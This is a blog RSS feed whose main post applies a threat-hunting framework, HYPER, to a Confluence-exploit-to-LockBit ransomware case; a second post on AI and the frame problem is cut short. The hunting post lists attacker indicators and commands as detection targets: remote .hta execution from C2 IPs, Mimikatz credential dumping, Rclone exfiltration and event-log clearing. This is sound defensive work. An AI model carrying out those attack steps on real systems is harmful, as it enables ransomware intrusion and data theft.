<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Tales of a Cyberscout]]></title><description><![CDATA[Words are cheap. Sense-making is not. Join our Quest to build a global community of active thinkers, builders and tinkerers! 🚀 Venture to the edges of hybrid intelligence and threat-informed defence, all with a touch of playful philosophical gardening 🌱]]></description><link>https://www.quasarops.com</link><image><url>https://substackcdn.com/image/fetch/$s_!sM2f!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa3bdd8bf-5a44-412c-9734-82d7f8b054a6_1024x1024.png</url><title>Tales of a Cyberscout</title><link>https://www.quasarops.com</link></image><generator>Substack</generator><lastBuildDate>Tue, 28 Apr 2026 20:25:15 GMT</lastBuildDate><atom:link href="https://www.quasarops.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Diego Perez]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[diego.perez@quasarops.com]]></webMaster><itunes:owner><itunes:email><![CDATA[diego.perez@quasarops.com]]></itunes:email><itunes:name><![CDATA[Diego Perez]]></itunes:name></itunes:owner><itunes:author><![CDATA[Diego Perez]]></itunes:author><googleplay:owner><![CDATA[diego.perez@quasarops.com]]></googleplay:owner><googleplay:email><![CDATA[diego.perez@quasarops.com]]></googleplay:email><googleplay:author><![CDATA[Diego Perez]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[Threat Hunting with HYPER]]></title><description><![CDATA[Or how to resist the allure of poor metrics]]></description><link>https://www.quasarops.com/p/threat-hunting-with-hyper</link><guid isPermaLink="false">https://www.quasarops.com/p/threat-hunting-with-hyper</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Wed, 05 Nov 2025 11:30:28 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!r-bB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!r-bB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!r-bB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!r-bB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!r-bB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!r-bB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!r-bB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg" width="1024" height="1024" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:226829,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/178062203?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!r-bB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!r-bB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!r-bB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!r-bB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6326bffa-c77f-402f-a0dd-2ec28a892e4c_1024x1024.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let me tell you a little secret. Do you know why your threat hunting efforts keep failing?</p><p>Because you focus on the wrong goals, driven by the wrong metrics, incentivised by the wrong rewards, sustained by people who forget threat hunting is equal parts art and science, creating the wrong lens in the first place.</p><p>We forget that when it comes to hunting, <strong>quality matters more than quantity</strong>.</p><p>And before your inner gnome (trust me, I can hear mine too) jumps up and says <em>&#8220;but with automation and AI you can have both&#8221;</em>, allow me to add: the problem is not whether you can achieve both or not, the problem arises when you put <em>quantity</em> OVER <em>quality</em> as the main target.</p><p>We confuse Output with Outcomes and Impact.</p><ul><li><p>Output is <strong>doing things right</strong> (<strong>efficiency</strong>)</p></li><li><p>Outcomes is <strong>doing the right thing</strong> (<strong>efficacy</strong>)</p></li><li><p>Impact is <strong>making the right things matter</strong> (<strong>significance</strong>)</p></li></ul><p>If you focus in the quantity of your hunts you are merely measuring Outputs, not Outcomes or Impact. And when all you do is focus on velocity, you spend less time in the most important phase of a hunt: <strong>the pre-hunt</strong>.</p><p>That is, the research, the expansion of your intel picture, the gathering of environment context <strong>that grounds your efforts into the fundamentals that deliver business value</strong>.</p><p>I have a powerful antidote to this madness, a simple mnemonic for the pre-hunt phase: <strong>HYPER</strong>. Do you want to know what it is about?</p><p><strong>HYPER</strong> is the framework that forces you into a critical pause. It&#8217;s the guardrail against rushing, ensuring you build your hunt on a foundation of quality.</p><p>It stands for:</p><ul><li><p><strong>HY:</strong> Hypothesis</p></li><li><p><strong>P:</strong> Profile</p></li><li><p><strong>E:</strong> Expected Observations</p></li><li><p><strong>R:</strong> Resources</p></li></ul><p>Of course, none of this matters if your threat hunting program is built on the wrong foundations, not understanding the key differences between Outputs and Outcomes, <em>and forcing MBA style business optimisation methods as if your hunt capability behaves like a predictable factory line</em>, squeezing the time and creativity needed for the deep research that actually delivers value.</p><p>This powerful mnemonic is a mental model that shifts your focus from <strong>Output</strong> to <strong>Outcomes</strong> by demanding you do the right research <em>before</em> you ever write a query. Let&#8217;s break down each component.</p><h2>HYPER</h2><p>The idea of using HYPER is grounded on the functional requirements phase of Spec Driven Development. Before you even start coding, you need to understand what your users want, which is another way of saying: <strong>you need to map out the problem space before you even begin solving it</strong>.</p><p>HYPER is a good method to ensure you spend enough time researching and planning your hunt <strong>because threat hunts are no exception to the GIGO (Garbage In, Garbage Out) principle</strong>. The richer your understanding of attack chains, threat actor profile, impacted services, operative context and hunt priority, the higher your changes of developing a fruitful hunt mission.</p><blockquote><p><strong>Important</strong>: You DO NOT HAVE TO keep ALL the pieces of HYPER, how deep you want to go depends on your quality appetite and whether your organisation TRULY reflects, understands and has laid out what it expects from a threat hunting program.</p></blockquote><h3>Hypothesis</h3><p>What is the behaviour we posit as expected if the threat where to realise in our environment?</p><h3>Profile</h3><p>This represents the <em>Hunt Profile</em>, not the threat actor profile. Threat actor profile and attack graph information is considered a necessary resource for the hunt, we assume that a Threat Intelligence capability exists which provides this fundamental ingredient.</p><p>The Hunt Profile <em>captures the who, what, when, where and why of the hunt</em>. We must have an idea of the following:</p><ul><li><p><strong>Duration:</strong> The approximate duration of the hunt. It does not have to be super precise, but it must be used as a boundary to avoid rabbit-holing (<em>we coined that word a few years ago with some colleagues: the act of going down rabbit holes and getting lost like Alice in Wonderland</em>). These boundaries keeps hunters accountable and constraints effort spent in the different phases. As a rule of thumb, 30% of your effort should be spent doing pre-hunt research, 50% running queries or attack simulations required to generate telemetry and 20% at the end for playbook generation and reporting.</p></li><li><p><strong>Time Range:</strong> The specific timeframe to investigate (e.g., Last 72 hours, Last 90 days, October 1-7). This timeframe is to be used as a loose guidance since you won&#8217;t always can to cover the whole spectrum.</p></li><li><p><strong>Exclusions:</strong> Any assets or data to intentionally ignore (e.g., HR Users, test environments, etc.).</p></li><li><p><strong>Priority Assessment:</strong> Scores of 1-4 based on your custom rubrics that helps prioritise the hunt. The only exception to the scoring is &#8220;Confidence Factor&#8221; which can go from 0.5 to 2 and is based on <a href="https://www.productplan.com/glossary/rice-scoring-model/">RICE method of scoring</a>. </p><ul><li><p><strong>Attack Likelihood (AL):</strong> This is a measure of intent and capability by the threat actor combined with environment defences that may disrupt or facilitate the success of an attack technique. Good CTI will provide this ingredient to you.</p></li><li><p><strong>Hunt Impact (HI):</strong> The degree to which a reported threat hypothesis addresses relevant gaps and aligns with organisational priorities, interests or concerns.</p></li><li><p><strong>Hunt Complexity (HC):</strong> The estimated difficulty rating of hunting around the topic in a given environment. This may include things like data availability or resource constraints.</p></li><li><p><strong>Confidence Factor (CF):</strong> The degree of confidence in the estimates made for all the other criteria, based on availability of supporting data.</p></li></ul></li></ul><div class="latex-rendered" data-attrs="{&quot;persistentExpression&quot;:&quot;Score = \\left( \\frac{\\text{AL} \\times \\text{HI} \\times \\text{CF}}{\\text{Hunt Complexity}} \\right) + 1&quot;,&quot;id&quot;:&quot;AXAFUHAFJJ&quot;}" data-component-name="LatexBlockToDOM"></div><p></p><ul><li><p><strong>Mitigations:</strong> This lists the existing security controls, policies, or configurations that should already be in place to prevent or detect this behaviour. This is critical as it helps refine the hypothesis (e.g., &#8220;Attacker is bypassing our EDR&#8217;s hook...&#8221;) and identifies which control&#8217;s logs you must check (e.g., &#8220;Did the control fire and we missed the alert?&#8221;).</p></li><li><p><strong>Potentially Impacted Systems &amp; Services:</strong> This identifies the &#8220;crown jewels&#8221; or critical business functions (e.g., Customer Database, Payment Processing API, Domain Controllers) that are the likely goal of the attack. This is vital for prioritising the hunt&#8217;s urgency and focusing the search on assets that have access to these services.</p></li><li><p><strong>Dependencies:</strong> Are there any dependencies worth noting here like requirements to engage certain teams, availability of architectural diagrams, etc?</p></li></ul><h3>Expected Observations</h3><p>If the threat techniques, procedures or other behaviours were to materialise in our environment, what is the evidence we expect to see?</p><p>This step helps you really focus on your research and understanding of attack chains. Here is were you let your DFIR monkey run wild and start to connect the dots. The deeper your DFIR and systems knowledge, the more precise and rich this phase will be.</p><h3>Resources</h3><p>This section is the toolbox for the hunt. It aims to identify an inventory of informational inputs, intelligence, and data sources the analyst will use to execute the hunt and test the hypothesis.</p><ul><li><p><strong>Threat Actor Profiles:</strong> An array of CTI reports, blogs or other documents that help you understand the threat profile, attack patterns, etc.</p></li><li><p><strong>Data Sources:</strong> The logs and telemetry to be queried, you can be generic (e.g., EDR logs, Cloudtrail logs) or specific (e.g. data source A of type B), aiming for specificity is better.</p></li><li><p><strong>Systems &amp; Assets:</strong> The specific hosts, domains, or user groups to focus on (e.g., All Domain Controllers, Tier-0 Assets, AWS Production Account, Finance Department user-group). Scores of 1-4 based on your custom rubrics that helps prioritise the hunt. The only exception to the scoring is &#8220;Confidence Factor&#8221; which can go from 0.5 to 2 and is based on RICE method of scoring.</p></li><li><p><strong>Dependencies:</strong> Are there any dependencies worth noting here like requirements to engage certain teams, availability of architectural diagrams, etc?</p></li></ul><h1>Applying HYPER to the DFIR Report</h1><p>Cool so we now have guidelines to help us structure a hunt mission. We need to use HYPER to build a story.</p><p>Let&#8217;s use the <a href="https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/">DFIRReport Confluence Exploit leads to Lockbit Ransomware</a> article as an example.</p><h2>HY: Hypothesis</h2><p>We hypothesize that a threat actor (LockBit affiliate) is actively exploiting the Confluence RCE vulnerability (<strong>CVE-2023-22527</strong>) on our public-facing servers. If successful, we expect them to establish C2 via Metasploit or AnyDesk, dump credentials using Mimikatz, and move laterally via RDP to deploy ransomware using legitimate tools like PDQ Deploy.</p><div><hr></div><h2>P: Profile</h2><ul><li><p><strong>Duration:</strong> 3 days (2 days for active hunting, 1 day for findings/reporting/playbook).</p></li><li><p><strong>Time Range:</strong> Last 30 days (to detect initial exploitation and any prior staging).</p></li><li><p><strong>Exclusions:</strong> Known internal and external vulnerability scanners, test Confluence instances.</p></li><li><p><strong>Priority Assessment:</strong></p><ul><li><p><strong>Attack Likelihood:</strong> <strong>High (4/4)</strong>. A critical (10.0 CVSS) RCE with public exploits is available.</p></li><li><p><strong>Hunt Impact:</strong> <strong>Critical (4/4)</strong>. This TTP leads directly to data exfiltration and domain-wide ransomware (LockBit).</p></li><li><p><strong>Hunt Complexity:</strong> <strong>Medium (2/4)</strong>. Initial access is specific, but lateral movement uses common admin tools (RDP, PDQ Deploy) which can be noisy.</p></li><li><p><strong>Confidence Factor:</strong> <strong>High (1.5)</strong>. We have a specific CVE and a detailed public report of the full attack chain.</p></li></ul></li><li><p><strong>Mitigations:</strong></p><ul><li><p>Confluence servers might be patched or behind WAF. But even so this doesn&#8217;t protect us during the un-patched window of exploitation.</p></li><li><p>Application Whitelisting <em>might</em> prevent deployment of AnyDesk.</p></li><li><p>EDR (should block Mimikatz, <code>lsass</code> access, and suspicious PowerShell).</p></li><li><p>Log forwarding (should prevent successful log clearing).</p></li></ul></li><li><p><strong>Potentially Impacted Systems &amp; Services:</strong></p><ul><li><p><strong>Crown Jewels:</strong> Payments processing system, Domain Controllers, Backup Servers (Veeam), DataBricks DBs containing customer PII.</p></li><li><p>All public-facing Windows Confluence servers.</p></li></ul></li><li><p><strong>Dependencies:</strong></p><ul><li><p>Access to Confluence, EDR, and DC logs.</p></li><li><p>Contact list for the Infrastructure team (re: PDQ Deploy, Confluence) and Security Engineering (re: WAF/EDR logs).</p></li></ul></li></ul><div><hr></div><h3>E: Expected Observations</h3><p>If the hypothesis is correct and the threat were to materialise in our environment, we expect to find the following evidence:</p><ul><li><p><strong>On the Confluence Server (Beachhead):</strong></p><ul><li><p>Web server logs showing POST requests to endpoints like <code>/template/aui/text-inline.vm</code>.</p></li><li><p>Process execution from the Confluence parent process (e.g., <code>java.exe</code>) spawning <code>cmd.exe</code> or <code>powershell.exe</code>.</p></li><li><p>The exploit (template injection) is often used to <em>drop</em> a web shell for easier, more stable access. We would hunt for suspicious <code>.jsp</code>, <code>.vm</code>, or <code>.class</code> files in Confluence installation and web directories. Their creation timestamps would be just after the initial exploit logs.</p></li><li><p>Initial discovery commands: <code>net user</code>, <code>whoami</code>, <code>query user</code>.</p></li><li><p><code>mshta.exe</code> executing a remote <code>.hta</code> file from a suspicious IP (e.g., <code>92[.]51.2[.]22</code>). The <code>.hta</code> file would be written to disk in the user&#8217;s (potentially System? or the Service Account used by Confluence server) <code>INetCache</code> directory (e.g., <code>C:\Users\&lt;user&gt;\AppData\Local\Microsoft\Windows\INetCache\</code>). We would hunt for this <code>.hta</code> file, as it contains the Metasploit stager.</p></li><li><p>PowerShell execution with Base64-encoded, Gzip-compressed stagers (Metasploit).</p></li><li><p>Download and installation of <code>AnyDesk.msi</code> and creation of a new service (<code>AnyDeskMSI.exe</code>).</p></li><li><p>Creation of a new local user (e.g., &#8220;backup&#8221;) and its addition to the local &#8220;Administrators&#8221; group (Event IDs 4720, 4732).</p></li><li><p>Need to look for Windows Event ID 1149 (&#8220;Remote Desktop Services: User authentication succeeded&#8221;) in the <code>Microsoft-Windows-TerminalServices-ClientActiveXCore</code> log. This confirms <em>outbound</em> RDP connections <em>from</em> the compromised server. For reference, see <a href="https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/terminalservices_remoteconnectionmanager_operational_1149/">CyberTriage blog</a>.</p></li><li><p><strong>RDP Bitmap Cache. </strong>We need to look in the RDP cache (<code>C:\Users\&lt;actor_user&gt;\AppData\Local\Microsoft\Terminal Server Client\Cache\</code>). These bitmap files are small pictures of the remote screens. This can provide a literal snapshot (although shaky) of what the attacker saw on the Domain Controller or Backup Server.</p></li></ul></li><li><p><strong>On Network and Other Hosts:</strong></p><ul><li><p><strong>Credential Access:</strong> <code>Mimikatz.exe</code> execution, EDR alerts for <code>lsass</code> access (Event ID 10), and execution of PowerShell scripts like <code>Veeam-Get-Creds-New.ps1</code> (Event ID 4104).</p></li><li><p><strong>Discovery:</strong> <code>NetScan.exe</code> execution, identified by anomalous SMB activity (creating/deleting <code>delete.me</code> files) across many hosts (Event ID 5145).</p></li><li><p><strong>Lateral Movement:</strong> RDP logon events (Event ID 4624) originating from the Confluence server, targeting Backup Servers, File Servers, and DCs. Further evidence of <code>.hta</code> files pulled into <code>INetCache.</code></p></li><li><p><strong>Exfiltration:</strong> <code>Rclone.exe</code> process execution and related network traffic (HTTP POSTs) to cloud storage (e.g., <code>mega.io</code>).</p></li><li><p><strong>Defense Evasion:</strong> <code>wevtutil.exe cl</code> or <code>Clear-EventLog</code> commands to clear Windows Event Logs (Event ID 1102).</p></li><li><p><strong>Impact:</strong> Use of <code>PDQDeployService.exe</code> to copy and execute ransomware binaries and batch scripts (e.g., <code>asd.bat</code>) across the environment.</p></li></ul></li></ul><div><hr></div><h3>R: Resources</h3><ul><li><p><strong>Threat Actor Profiles:</strong></p><ul><li><p><a href="https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/">The DFIR Report: &#8220;Confluence Exploit Leads to LockBit Ransomware&#8221;</a></p></li><li><p>CTI regarding LockBit affiliates and ShadowSyndicate.</p></li><li><p>Trend Micro / Splunk reports on CVE-2023-22527.</p></li></ul></li><li><p><strong>Data Sources:</strong></p><ul><li><p><strong>Endpoint:</strong> EDR / Sysmon logs (Process, Network, Service Creation, LSASS Access).</p></li><li><p><strong>Network:</strong> Firewall, Proxy, and Zeek/Suricata logs (focus on C2 IPs <code>92[.]51.2.22</code>, <code>92[.]51.2.27</code> and exfil to <code>mega.io</code>).</p></li><li><p><strong>Host:</strong> Windows Event Logs (Security, System, PowerShell Script Block Logging).</p></li><li><p><strong>App:</strong> Confluence access and application logs.</p></li></ul></li><li><p><strong>Systems &amp; Assets (to query):</strong></p><ul><li><p>Public Confluence Servers.</p></li><li><p>DataBricks Audit Logs if suspicions of lateral movement to cloud services due to harvested API keys.</p></li><li><p>Domain Controllers.</p></li><li><p>Veeam Backup Servers.</p></li><li><p>Enterprise File Servers.</p></li><li><p>Hosts with PDQ Deploy installed.</p></li></ul></li></ul>]]></content:encoded></item><item><title><![CDATA[Unfolding the AI Narrative - Part 2]]></title><description><![CDATA[Local Maxima & The Frame Problem]]></description><link>https://www.quasarops.com/p/unfolding-the-ai-narrative-part-2</link><guid isPermaLink="false">https://www.quasarops.com/p/unfolding-the-ai-narrative-part-2</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sat, 11 Oct 2025 02:19:58 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Lf1V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Welcome to the Tales of a Cyberscout, where we explore topics ranging from active cyber defence to technology and society, all of it with a drizzle of zesty cynicism and philosophical gardening.</p><h2>Recap: Intelligence Friction and Flow</h2><p>Before we dig in, let's do a quick recap of my thoughts on intelligence, friction, and flow from <a href="https://quasarops.substack.com/p/unfolding-the-ai-narrative-part-1">Part 1 of the series</a>.</p><p>In my view, intelligence isn't just about <em>thinking</em>. <strong>It's a fundamental force, a drive for agency within an environment</strong>, critically shaped by the need for self-preservation, i.e. having real "skin in the game". We defined intelligence as</p><div class="pullquote"><p>a dispositional, emergent, and generative capacity for agency in an environment, underpinned by evolutionary pressures favoring self-preservation and adaptation.</p></div><p>This is where I see a key difference with what hype-sorcerers call AI: <em>for me, it's a probability engine that lacks the inherent concern of finitude and risk</em>.</p><p>In the organic world, self-preservation implicitly assumes you have an instinct that is tied to a body that defines that which should be preserved for your life to continue unfolding.</p><p>AI's attention mechanisms, driven by weights, cannot encode this factor because these probability engines don't know <em>what part of their network they need to preserve</em> to maintain a minimal functioning core.</p><p>While our human intelligence and AI are becoming increasingly co-dependent, AI's progress isn't seamless. In our last post, I posited we can understand its development much like electricity: facing resistance but driven by potential.</p><p>I identified two main <em>frictions</em> holding back AI: the "Frame Problem" which represents its struggle to interpret relevance in complex environments (<em>f</em> factor), and the "Cognitive Potential Problem", relating to its scalability and how deeply it's embedded in the world (<em>cp</em> factor).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Lf1V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Lf1V!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 424w, https://substackcdn.com/image/fetch/$s_!Lf1V!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 848w, https://substackcdn.com/image/fetch/$s_!Lf1V!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 1272w, https://substackcdn.com/image/fetch/$s_!Lf1V!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Lf1V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png" width="492" height="557" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:557,&quot;width&quot;:492,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:45477,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/169284538?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Lf1V!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 424w, https://substackcdn.com/image/fetch/$s_!Lf1V!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 848w, https://substackcdn.com/image/fetch/$s_!Lf1V!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 1272w, https://substackcdn.com/image/fetch/$s_!Lf1V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8828caa-463e-4047-99cf-0cf76a4fdc33_492x557.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So, when we ask "why not AGI yet?", I argue it's not just about insufficient computing power. It's because we haven't yet managed to sufficiently minimize this environmental resistance and maximize AI's cognitive potential through deep, distributed embedding into the everyday world, moving beyond a shallow AI to a truly integrated (deep) one.</p><h2>Local Maxima</h2><p>If you would have to come up with a different code solution every time you need to solve <strong>different instances of the same problem</strong>, then either it's <em>not the same problem</em> or you lack the capacity to solve <em>concurrent instances</em> of the same problem.</p><p>The first issue is a problem of pattern <strong>generalization</strong>, you are working with different instances of <strong>different problems</strong> and your computing network is not clever enough to realize that its dealing with <em>different problems 